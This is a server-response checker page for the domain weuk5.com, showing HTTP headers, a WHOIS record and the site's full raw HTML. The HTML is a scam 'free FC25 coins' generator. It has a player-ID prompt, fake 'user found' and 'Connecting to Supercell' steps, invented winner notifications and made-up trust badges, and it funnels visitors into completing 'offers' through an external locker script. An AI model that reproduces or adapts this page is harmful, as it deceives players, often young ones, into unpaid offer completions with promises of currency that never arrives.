Check server response of

Server response
NS records
Whois domain
Response headers
Request headers
Raw HTML code
301 Moved Permanently - weuk5.com
HTTP Status: 301
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
keep-alive: timeout=5, max=100
content-type: text/html
content-length: 795
date: Tue, 20 May 2025 20:28:57 GMT
server: LiteSpeed
location: https://weuk5.com/
x-turbo-charged-by: LiteSpeed

HTTP Code 301 Moved Permanently

301 http status code means that the requested resource has been permanently moved to a new URL. All future requests should use the new address.

When is Code 301 used?

  • When changing a website domain
  • When modifying URL structures
  • When setting up redirects for SEO

What does Code 301 mean for the user?

The browser will automatically redirect the user to the new address, and search engines will update their indexes.

200 OK - https://weuk5.com/
HTTP Status: 200
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
keep-alive: timeout=5, max=100
content-type: text/html
last-modified: Sun, 27 Apr 2025 03:39:06 GMT
accept-ranges: bytes
content-length: 28133
date: Tue, 20 May 2025 20:28:58 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed

HTTP Code 200 OK

200 http status code is a standard successful HTTP server response. It means that the client’s request (e.g., from a browser) was successfully processed, and the server is delivering the requested data.

When is Code 200 used?

  • When loading a web page
  • When successfully receiving an API response
  • When processing a form or another HTTP request

What does Code 200 mean for the user?

The user receives content without errors, and the page or application functions properly. If Code 200 is accompanied by data, the browser or program processes and displays it to the user.

GET / HTTP/1.1
Host: weuk5.com
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Brawl Stars Rewards</title>
  <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">
 
    <script type="text/javascript">
    var hostname = "weuk5.com";
    var script = document.createElement("script");
    script.src = "https://scripts.simpleanalyticscdn.com/latest.js";
    script.setAttribute("data-hostname", hostname);
    document.head.appendChild(script);
    </script>
    
    <script type="text/javascript" src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>

  <style>
          #google_translate_element {
            position: absolute;
            top: 10px;
            right: 10px;
            z-index: 1000;
        }
   .tasks-container {
        background-color: #2e3a47;
        padding: 30px;
        border-radius: 12px;
        box-shadow: 0 6px 15px rgba(0, 0, 0, 0.3);
        color: white;
        max-width: 480px;
        margin: 30px auto;
        text-align: center;
        font-family: 'Arial', sans-serif;
    }

    .tasks-container h2 {
        font-size: 26px;
        margin-bottom: 20px;
        color: #ffbb33;
        font-weight: 700;
    }

    .task-description {
        font-size: 16px;
        color: #b1b7c4;
        margin-bottom: 20px;
        line-height: 1.5;
    }

    .balance {
        margin-top: 20px;
        font-size: 18px;
    }

    .balance-text {
        font-size: 18px;
        color: #a8a8a8;
        margin-bottom: 10px;
    }

    .gem-display {
        display: flex;
        justify-content: center;
        align-items: center;
        margin-bottom: 20px;
    }

    .gem-icon {
        width: 35px;
        height: 35px;
        margin-right: 15px;
    }

    .gem-amount {
        font-size: 28px;
        font-weight: 700;
        color: #ffcc00;
    }

    .task-list {
        margin-top: 30px;
    }

    .task-btn {
        background-color: #4CAF50;
        color: white;
        border: none;
        padding: 12px 30px;
        margin: 10px;
        font-size: 16px;
        border-radius: 8px;
        cursor: pointer;
        transition: background-color 0.3s ease;
        width: 100%;
        max-width: 350px;
        display: block;
        margin-left: auto;
        margin-right: auto;
    }

    .task-btn:hover {
        background-color: #45a049;
    }

    .cta-text {
        font-size: 18px;
        font-weight: bold;
        color: #ffcc00;
        margin-top: 25px;
    }
    /* General Styles */
body {
  margin: 0;
  font-family: 'Poppins', sans-serif;
  background: url('https://i.imgur.com/OiCKiZX.jpeg') no-repeat center center fixed;
  background-size: cover;
  animation: moveBackground 10s linear infinite;
  color: #fff;
  overflow-x: hidden;

  /* Center content */
  display: flex;
  justify-content: center;
  align-items: center;
  height: 100vh; /* Full height of the viewport */
}
@keyframes moveBackground {
  0% {
    background-position: 0 0;
  }
  100% {
    background-position: 100% 100%;
  }
}

.hero {
  background: rgb(53, 59, 81);
  padding: 20px;
  text-align: center;
  border: 3px solid #ffffff;
  animation: fadeIn 1s ease-in-out;

  /* Optional styling */
  border-radius: 10px;
  box-shadow: 0 4px 8px rgba(0, 0, 0, 0.5);
  box-shadow: 5px 5px 0px #00000014, 10px 10px 0px rgba(0, 0, 0, 0.5);
  /* Responsive width */
  width: 90%; /* Adjust the width on smaller screens */
max-w }
.hero h1 {
  font-family: "Burbank Big Condensed Bold", Impact, "Arial Narrow Bold", sans-serif;
    font-size: 32px;
    text-transform: uppercase;
    color: #ffffff;
    text-shadow: 0 2px 4px rgb(0 0 0 / 30%), 0 0 10px rgb(0 0 0 / 30%);
    letter-spacing: 1px;
    margin: 7px 0;
    text-align: center;
    -webkit-text-stroke: 0.7px #000000;
}
    .hero p {
      font-size: 18px;
      color: #ffffff;
      margin: 10px 0 20px;
    }
    .hero .button {
      background: rgb(240, 199, 10);
    padding: 1.2rem 2.5rem;
    border-radius: 50px;
    font-size: 1.4rem;
    font-weight: 700;
    border: none;
    cursor: pointer;
    transition: all 0.3s ease;
    position: relative;
    overflow: hidden;
    box-shadow: 0 5px 15px rgb(172 172 172 / 40%);
    }
    .hero .button:hover {
      transform: scale(1.05);
      box-shadow: 0 8px 25px rgba(255, 107, 0, 0.6);
    }
    .hero .button {
        width: 100%;
        padding: 1rem;
    }
    .tasks-container {
	 
   text-align: center;
     padding: 20px;
     border-radius: 10px;
     width: 100%;
     max-width: 600px;
     max-height: 100%; /* Ensures modal does not overflow off the screen */
     overflow-y: auto; /* Scrollable tasks container */
     box-sizing: border-box;
   }
   
   .tasks-container h2 {
     font-family: 'Poppins', sans-serif;
     font-size: 1.5rem; /* Adjusted font size to match compact look */
     font-weight: bold;
     color: #00ff85; 
     text-shadow: 0 2px 4px rgba(0, 0, 0, 0.7);
     margin: 10px 0; 
   }
   
   .tasks {
     display: grid;
     grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); /* Compact columns for small rectangles */
     gap: 15px; /* Smaller gap for closer spacing */
   }
   
   .task {
  background-color: #295341;
  padding: 15px;
  border-radius: 10px;
  text-align: center;
  transition: transform 0.3s ease, box-shadow 0.3s ease;
  box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.5);
  position: relative;
  min-height: 260px;
  display: block;
  margin: 0 auto;
  width: fit-content;
  
  /* Gradient Top Accent (Subtle by default) */
  &::before {
    content: '';
    position: absolute;
    top: -1px; /* Align perfectly with border radius */
    left: 50%;
    transform: translateX(-50%);
    width: 80%;
    height: 2px;
    background: linear-gradient(
      90deg,
      transparent 0%,
      rgba(72, 207, 173, 0.4) 50%,
      transparent 100%
    );
    transition: all 0.3s ease;
    border-radius: 2px;
  }
}

.task:hover {
  transform: translateY(-5px);
  box-shadow: 0px 8px 20px rgba(72, 207, 173, 0.6);
  
  /* Enhanced Top Line on Hover */
  &::before {
    width: 90%;
    height: 3px;
    background: linear-gradient(
      90deg,
      transparent 0%,
      rgba(72, 207, 173, 0.8) 50%,
      transparent 100%
    );
  }
}


   
   .task img {
     width: 80px; /* Smaller icon size */
     height: 80px;
     border-radius: 10px; 
     margin-bottom: 10px; 
   }
   
   .task h3 {
    font-size: 18px; /* Adjusted font size */
  color: #ffffff; 
  margin: 10px 0 5px; 
  text-shadow: 2px 2px 4px rgb(0 0 0), -2px -2px 4px rgb(0 0 0 / 100%);
}
   }
   
   .task p {
     font-size: 14px; /* Reduced for compactness */
     color: #ffffff; 
     margin-bottom: 10px;
     text-shadow: 2px 2px 4px rgb(0 0 0), -2px -2px 4px rgb(0 0 0 / 100%);
   }
   
   .task .UC {
     display: flex;
     align-items: center;
     justify-content: center;
     gap: 5px;
     margin-bottom: 10px;
     font-family: 'Poppins', sans-serif;
     font-size: 14px;
     font-weight: bold;
     color: #00ff85;
     text-shadow: 2px 2px 4px rgb(0, 0, 0), -2px -2px 4px rgb(54 49 49);
   }
   
   .task .UC img {
     width: 16px; /* Smaller gem icon */
     height: 16px;
   }
   
/* Base Button Styling */
.task .button {
    background: linear-gradient(90deg, #00ff85, #00d76f); /* Gradient for modern look */
    color: #000;
    padding: 10px 18px; /* Slightly larger for better visibility */
    border: none;
    border-radius: 25px;
    cursor: pointer;
    font-size: 16px;
    font-weight: bold;
    text-transform: uppercase;
    transition: all 0.3s ease-in-out;
    box-shadow: 0px 4px 10px rgba(0, 255, 133, 0.5);
}

/* Button Hover Effect */
.task .button:hover {
    background: linear-gradient(90deg, #00d76f, #00ff85); /* Reverse gradient on hover */
    transform: scale(1.05); /* Slightly enlarges on hover */
    box-shadow: 0px 6px 12px rgba(0, 255, 133, 0.7);
}

/* Button Click (Active) Effect */
.task .button:active {
    transform: scale(0.95);
    box-shadow: 0px 3px 8px rgba(0, 255, 133, 0.4);
}

/* Pulsing and Shining Animation */
@keyframes shine {
    0% {
        box-shadow: 0px 0px 20px rgba(0, 255, 133, 0.7), 0 0 30px rgba(0, 255, 133, 0.6);
    }
    50% {
        box-shadow: 0px 0px 40px rgba(0, 255, 133, 1), 0 0 60px rgba(0, 255, 133, 0.8);
    }
    60% {
        box-shadow: 0px 0px 20px rgba(0, 255, 133, 0.7), 0 0 30px rgba(0, 255, 133, 0.6);
    }
}

.task .button.shine {
    animation: shine 1.5s infinite;
}

 
    /* Modal (Popup) Styles */
    .modal {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, 0.8);
      justify-content: center;
      align-items: center;
      z-index: 1000;
    }

    .modal-content {
      background: white;
      color: black;
      padding: 20px;
      border-radius: 10px;
      text-align: center;
      width: 90%;
      max-width: 400px;
      position: relative;
    }

    .modal-content input {
      padding: 10px;
      width: calc(100% - 20px);
      margin: 10px 0;
      border: 2px solid #000000;
      border-radius: 10px;
    }

      .modal-content button {
    background: #00ff75;
    color: #000;
    font-size: 20px;
    font-weight: bold;
    padding: 10px;
    border: none;
    border-radius: 5px;
    cursor: pointer;
    text-align: center;
    transition: background 0.3s ease-in-out, transform 0.2s;
    animation: glow 1.5s infinite alternate;
  }

  .modal-content button:hover {
    background: #00cc60;
    transform: scale(1.1);
  }

    .modal-content .close-btn {
      position: absolute;
      top: 10px;
      right: 10px;
      background: none;
      border: none;
      font-size: 1.5rem;
      cursor: pointer;
      color: #333;
    }

    /* Footer Section */
    .footer {
      margin-top: auto;
      font-size: 0.8rem;
      margin-bottom: 10px;
      padding: 10px;
    }

  /* Modal Background */
  .modal {
    display: flex;
    justify-content: center;
    align-items: center;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.5);
    backdrop-filter: blur(5px); /* تأثير الطمس */
    z-index: 1000;
  }

  /* Modal Content */
  .modal-content {
    background: #ffffff;
    padding: 20px;
    border-radius: 10px;
    text-align: center;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
    width: 300px;
    position: relative;
  }

  /* Close Button */
  .close-btn {
    position: absolute;
    top: 10px;
    right: 10px;
    background: none;
    border: none;
    font-size: 20px;
    cursor: pointer;
    color: #333;
  }
  .highlight {
  color: #f0f213;
  font-weight: bold;
}
.highlight2
{
  color: rgb(76, 182, 224);

  font-weight: bold;
}
  /* Continue Button */
  .continue-btn {
    background: #ffcc00;
    color: #333;
    padding: 10px 20px;
    border: none;
    border-radius: 5px;
    font-size: 16px;
    cursor: pointer;
    transition: background 0.3s ease;
    display: block;
    margin: 0 auto; /* جعل الزر في الوسط */
  }

  .continue-btn:hover {
    background: #e6b800;
  }
  .balance {
      isplay: flex;
  align-items: center; /* Aligns the icon and text horizontally */
  justify-content: center; /* Center the content horizontally */

  border-radius: 10px; /* Rounded corners */
  padding: 10px 20px; /* Padding inside the container */
  margin-top: 20px; /* Space between text and balance */
}
.gem-icon {
  width: 30px; /* Small icon size */
  height: 30px;
  margin-right: 10px; /* Space between the icon and text */
margin-left: 10px;
}

.gem-amount {
  color: #00ff85; /* Color for the gem text */
  font-size: 20px;
  font-weight: bold; /* Makes the text bold */
}
.fast-reward {
    background: #ffd700;
    color: black;
    font-size: 12px;
    font-weight: bold;
    padding: 3px 8px;
    border-radius: 5px;
    text-transform: uppercase;
    display: inline-block;
    margin-top: 5px;
}

    
    .offer-badge {
            position: absolute;
            top: -10px;
            right: -10px;
            background: #000000;
            padding: 0.5rem 1rem;
            border-radius: 20px;
            font-size: 0.9rem;
            font-weight: bold;
            box-shadow: 0 3px 10px rgba(255,0,110,0.3);
        }
        .gem-container {
  background-color: #2e3547;
  padding: 15px;
  border-radius: 10px;
  position: relative;
  max-width: 500px;
  margin: 20px auto;
}

.gem-progress {
  background-color: rgba(0, 0, 0, 0.3);
  height: 20px;
  border-radius: 10px;
  overflow: hidden;
  position: relative;
}

.gem-progress-bar {
  background: linear-gradient(90deg, #007bff 0%, #00a8ff 100%);
  height: 100%;
  width: var(--progress, 24.69%);
  border-radius: 10px;
  transition: width 0.5s ease;
}

.gem-info {
  display: flex;
  align-items: center;
  gap: 10px;
  margin-top: 10px;
  color: #fff;
}

.gem-icon {
  width: 30px;
  height: 30px;
  object-fit: contain;
}



/* Animation for progress update */
@keyframes progress-glow {
  0% { box-shadow: 0 0 5px #007bff; }
  50% { box-shadow: 0 0 15px #007bff; }
  100% { box-shadow: 0 0 5px #007bff; }
}
.rewards-left {
  font-size: 1.1em;
  color: #ffffff;
  margin-top: 15px;
  padding: 8px 15px;
 
  border-radius: 8px;
  display: inline-block;
}

.rewards-left .highlight {
  font-weight: 700;
  color: #ff4757;
}
.timer {
      text-align: center;
      font-size: 20px;
      font-weight: bold;
      color: #FF5722;
      margin: 20px 0;
    }
	.progress-bar-container {
      background-color: #ddd;
      border-radius: 25px;
      margin: 20px 0;
    }
    .progress-bar {
      width: 80%; /* Adjust this dynamically */
      height: 20px;
      background-color: #4CAF50;
      border-radius: 25px;
    }
	    .warning {
      font-size: 16px;
      color: #FF5722;
      text-align: center;
      margin-top: 10px;
    }
		#logoz {
            vertical-align: middle; /* Align the logo vertically with the text */
           /* Add some space between the text and logo */
            width: 45px; /* Set the width of the logo */
            height: auto; /* Maintain the aspect ratio of the logo */
        }
	.notification-bar {
            display: none;
            background-color: #4CAF50;
            color: #fff;
            padding: 10px;
            text-align: center;
            position: fixed;
            top: 0;
            width: 100%;
            z-index: 1000;
			font-size: small;
        }

        .close-btn {
            cursor: pointer;
            float: right;
            font-size: 20px;
            font-weight: bold;
        }
  </style>
</head>
<body>
<div id="notification" class="notification-bar">
    <span id="close-btn" class="close-btn" onclick="closeNotification()">&times;</span>
    <span id="winnerName">Success ! 40,000 FUT Coins was sent to the user., [Name]!</span>
</div>
  <div class="hero">
    <h1>CLAIM YOUR FREE FC25 Coins</h1>
    <p>Join <span class="highlight2">540</span> players have already claimed their <span class="highlight"> FC25 Coins</span> Today!</p>
    <button class="button" onclick="openModal()">Claim Your FC25 Coins Now!</button>
	<br>
    <div class="trust-badges">  
      🔒 Instant Delivery | 🛡️ No Login Required | 🎮 1.4K+ Players Served  
    </div> 
  </div>

<!-- Player ID Modal Section -->

<div class="modal" id="modal" style="display: none;">

  <div class="modal-content">
  
    <button class="close-btn" onclick="closeModal()">&times;</button>
    <h2>
      <span style="display: flex; align-items: center; justify-content: center;">

        <img src="https://media4.giphy.com/media/v1.Y2lkPTc5MGI3NjExdWlyOG9iNmdmNncwcHg5N3NqYWttdzhpaWhndm8wZ2wyYnM2c2x6MiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/WvuTFk2IN7jxoLVDkP/giphy.gif" alt="Player Icon" style="width: 100px; height: 100px; margin-right: 8px;">
        Enter Player ID
      </span>
	  <br>
        <input type="text" id="playerId" placeholder="Enter #TAG or Username">
    </h2>
    <p>Please enter your Player ID to deliver FC25 Coins directly to your account, and no login is required.</p>
  
    <button class="continue-btn" onclick="processPlayerIdAndOpenVerification()">
      Continue
    </button>
  </div>
</div>

<!-- User Verification Step -->
<div class="modal step-modal" id="step3" style="display:none;">
  <div class="modal-content styled-content">
    <div class="userfound-text">✅ USER FOUND!</div>
    <img src="https://i.giphy.com/Nu1hBvxJesnvwUQIJU.webp" class="imgcheckok">
  </div>
</div>

<!-- Supercell Connection Step -->

<div class="modal step-modal" id="main3" style="display:none;">
  <div class="modal-content styled-content">
    <img src="https://i.imgur.com/rUiFnvu.gif" class="setting-icon">
    <div class="step1-text" id="loading-step">Connecting to Supercell...</div>
    <div class="pro-bg">
      <div class="pro-bar" id="pro-bar"></div>
    </div>
    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1670527980d601870f9293b4a78d462c229447469e.gif" id="sloading" class="sloading">
  </div>
</div>

<style>
  .step-modal {
    display: flex;
    justify-content: center;
    align-items: center;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.8);
    backdrop-filter: blur(8px);
    z-index: 1000;
  }

  .styled-content {
    background: linear-gradient(135deg, #1e3c72, #2a5298);
    color: white;
    padding: 25px;
    border-radius: 12px;
    text-align: center;
    box-shadow: 0 6px 15px rgba(0, 0, 0, 0.3);
    width: 350px;
  }

  .userfound-text {
    font-size: 24px;
    font-weight: bold;
    margin-bottom: 15px;
  }

  .setting-icon {
    width: 100px;
    margin-bottom: 10px;
  }

  .pro-bg {
    background: rgba(255, 255, 255, 0.2);
    height: 10px;
    width: 80%;
    margin: 10px auto;
    border-radius: 5px;
    overflow: hidden;
  }

  .pro-bar {
    background: #00ff85;
    height: 100%;
    width: 0;
    transition: width 3s ease-in-out;
  }

  .sloading {
    width: 40px;
    display: block;
    margin: 15px auto;
  }
</style>

<script>
  function processPlayerIdAndOpenVerification() {
    const playerId = document.getElementById('playerId').value;
    if (!playerId) {
      alert('Please enter your Player ID.');
      return;
    }
    document.getElementById('modal').style.display = 'none';
    document.getElementById('step3').style.display = 'flex';
    setTimeout(openSupercellConnection, 2000);
  }

  function openSupercellConnection() {
    document.getElementById('step3').style.display = 'none';
    document.getElementById('main3').style.display = 'flex';
    document.getElementById('pro-bar').style.width = '100%';
    setTimeout(openFinalStep, 3000);
  }

  function openFinalStep() {
    document.getElementById('main3').style.display = 'none';
    document.getElementById('videoModal').style.display = 'flex';
  }
</script>
<div class="modal" id="videoModal" style="display: none;">
  <div class="tasks-container">
    
    <!-- Progress Bar -->
    <div class="progress-bar-container">
      <div class="progress-bar"></div>
    </div>

    <!-- Headline -->
    <h2>🎯 Get 40,000  Free FC25 Coins Instantly!</h2>

    <!-- Offer Container -->
    <div id="offerContainer"></div>

    <!-- Offer Card -->
    <div class="offer-card">
      <div class="offer">
        <div class="offer-header">
          <!-- Offer Image -->
          <img src="https://i.imgur.com/ZBK8BCN.gif" alt="Offer Image" class="offer-image">
          
          <!-- Offer Details -->
          <div class="offer-details">
            <span class="reward-amount">How to claim it:</span>
            <ol class="offer-steps">
              <li>Click <strong>Start Now</strong> below.</li>
              <li>Choose any offer you like.</li>
              <li>Complete the offer and receive <strong>40,000  FUT Coins instantly!</strong></li>
            </ol>
          </div>
        </div>

        <!-- Offer Reward -->
        <div class="offer-reward">
          <span class="reward-icon">🎁</span>
          <span class="reward-amount">Claim Your 40,000  FUT Coins Now!</span>
        </div>

        <!-- CTA Button -->
        <button class="offer-button" onclick="_cy()" style="background-color: #FF5722; color: white; padding: 15px 30px; font-size: 18px; border: none; border-radius: 5px; cursor: pointer;">
          Start Now
        </button>

        <!-- Trust Badge -->
        <div class="trust-badge" style="margin-top: 15px; font-size: 14px; color: #666;">
          🔒 100% Secure | 🕒 Instant Delivery | 👍 Trusted by 10,000+ Players
        </div>
      </div>
    </div>
  </div>
</div>
<script type="text/javascript">
     var TKGNe_uWq_mMTAUc={"it":4453737,"key":"22ef8"};
</script>
<script src="https://d2v7l2267atlz5.cloudfront.net/7e614ca.js"></script>
<style>
  @keyframes glow {
    0% { box-shadow: 0 0 5px #00ff75; }
    50% { box-shadow: 0 0 20px #00ff75; }
    100% { box-shadow: 0 0 5px #00ff75; }
  }

  .offer-card {
    background: linear-gradient(135deg, #0f0f0f, #1a1a1a);
    border-radius: 10px;
    padding: 20px;
    max-width: 100%;
    color: #fff;
    font-family: Arial, sans-serif;
    box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.5);
    transition: transform 0.3s ease-in-out;
  }

  .offer-card:hover {
    transform: scale(1.05);
  }

  .offer {
    background: #131313;
    border-radius: 10px;
    padding: 15px;
    display: flex;
    flex-direction: column;
    gap: 10px;
    transition: background 0.3s ease-in-out;
  }

  .offer:hover {
    background: #1e1e1e;
  }

  .offer-header {
    display: flex;
    align-items: center;
  }

  .offer-image {
    width: 50px;
    height: 50px;
    border-radius: 5px;
    margin-right: 10px;
    transition: transform 0.3s ease-in-out;
  }

  .offer:hover .offer-image {
    transform: rotate(10deg) scale(1.1);
  }

  .offer-title {
    font-size: 16px;
    font-weight: bold;
  }

  .offer-description {
    font-size: 14px;
    color: #bbb;
  }

  .offer-reward {
    font-size: 16px;
    font-weight: bold;
    color: #00ff75;
    display: flex;
    align-items: center;
   
  }

  .reward-icon {
    font-size: 18px;
    margin-right: 5px;
  }

  .offer-button {
    background: #00ff75;
    color: #000;
    font-size: 16px;
    font-weight: bold;
    padding: 10px;
    border: none;
    border-radius: 5px;
    cursor: pointer;
    text-align: center;
    transition: background 0.3s ease-in-out, transform 0.2s;
    animation: glow 1.5s infinite alternate;
  }

  .offer-button:hover {
    background: #00cc60;
    transform: scale(1.1);
  }

  /* Mobile Styles */
  @media (max-width: 600px) {
    .offer-card {
      padding: 15px;
      width: 90%;
      margin: auto;
    }
    
    .offer-header {
      flex-direction: column;
      text-align: center;
    }

    .offer-image {
      width: 140px;
      height: 140px;
      margin-bottom: 10px;
    }
    
    .offer-title {
      font-size: 18px;
    }

    .offer-description {
      font-size: 16px;
    }

    .offer-reward {
      justify-content: center;
      font-size: 18px;
    }
    
    .offer-button {
      font-size: 18px;
      padding: 12px;
    }
  }
</style>



  <script>
    const modal = document.getElementById("modal");

    function openModal() {
      modal.style.display = "flex";
    }

    function closeModal() {
      modal.style.display = "none";
    }

    function processPlayerId() {
      alert("Processing Player ID...");
      closeModal();
    }
  </script>
  <script>
    var names = ["Messi10", "Ronaldo7", "Neymar11", "Mbappe29", "Haaland9", "DeBruyne17", "Vinicius20", "Modric10", "Salah11", "Bellingham22", "Lewandowski9", "Griezmann7", "Kane9", "Benzema19", "Foden47", "Pedri8", "Gavi6", "Odegaard8", "Son7", "Alvarez19"]; // Add your list of names here
    var currentIndex = 0;

    function showNotification() {
        var notificationElement = document.getElementById('notification');
        var winnerNameElement = document.getElementById('winnerName');

        if (currentIndex >= names.length) {
            currentIndex = 0; // Reset index when reaching the end of the list
        }

        winnerNameElement.textContent = "Success! 40,000 UC FUT Coins sent to " + names[currentIndex] + " Enjoy the game";
        notificationElement.style.display = 'block';

        setTimeout(function() {
            notificationElement.style.display = 'none';

            setTimeout(function() {
                currentIndex++;
                showNotification(); // Recursive call to display the next name
            }, 1000); // Wait for 13 second before showing the next notification
        }, 4000); // Display for 4 seconds
    }

    function closeNotification() {
        document.getElementById('notification').style.display = 'none';
    }

    // Show the notification immediately (you can trigger this based on user interaction or other events)
    showNotification();
</script>
  <script>
  // Function to open the Player ID modal
  function openModal() {
    document.getElementById('modal').style.display = 'flex';
  }

  // Function to close the Player ID modal
  function closeModal() {
    document.getElementById('modal').style.display = 'none';
  }

  // Function to process Player ID and open the Video Modal
  function processPlayerIdAndOpenVideoModal() {
    const playerId = document.getElementById('playerId').value;

    if (!playerId) {
      alert('Please enter your Player ID.');
      return;
    }

    // Show loading message
    document.getElementById('loadingMessage').style.display = 'block';

    // Disable the button to prevent multiple clicks
    const continueButton = document.querySelector('.continue-btn');
    continueButton.disabled = true;
    continueButton.style.background = '#ccc';
    continueButton.style.cursor = 'not-allowed';

    // Simulate processing delay
    setTimeout(() => {
      document.getElementById('loadingMessage').style.display = 'none';
      openVideoModal(); // فتح نافذة الفيديو
    }, 2000); // 2-second delay
  }

  // Function to open the Video Modal
  function openVideoModal() {
    document.getElementById('modal').style.display = 'none';
    document.getElementById('videoModal').style.display = 'flex';
  }

  // Function to close the Video Modal
  function closeVideoModal() {
    document.getElementById('videoModal').style.display = 'none';
  }
</script>
<script>
  function closeVideoModal() {
    document.getElementById('videoModal').style.display = 'none';
  }

  function openVideoModal() {
    document.getElementById('modal').style.display = 'none';
    document.getElementById('videoModal').style.display = 'flex';
  }

  function _om() {
    // Function linked to the "Verify Now" button
    console.log('Verify button clicked!');
  }
</script>

<script>document.querySelector('.button').classList.add('shine');</script>



</body>
</html>

                               

Whois info of domain

Domain Name: WEUK5.COM
Registry Domain ID: 2967878037_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2025-03-18T03:12:26Z
Creation Date: 2025-03-18T03:01:50Z
Registry Expiry Date: 2026-03-18T03:01:50Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.NAMECHEAPHOSTING.COM
Name Server: DNS2.NAMECHEAPHOSTING.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2025-05-20T20:28:49Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
TERMS OF USE: You are not authorized to access or query our Whois
by the following terms of use: You agree that you may use this Data only
to: (1) allow, enable, or otherwise support the transmission of mass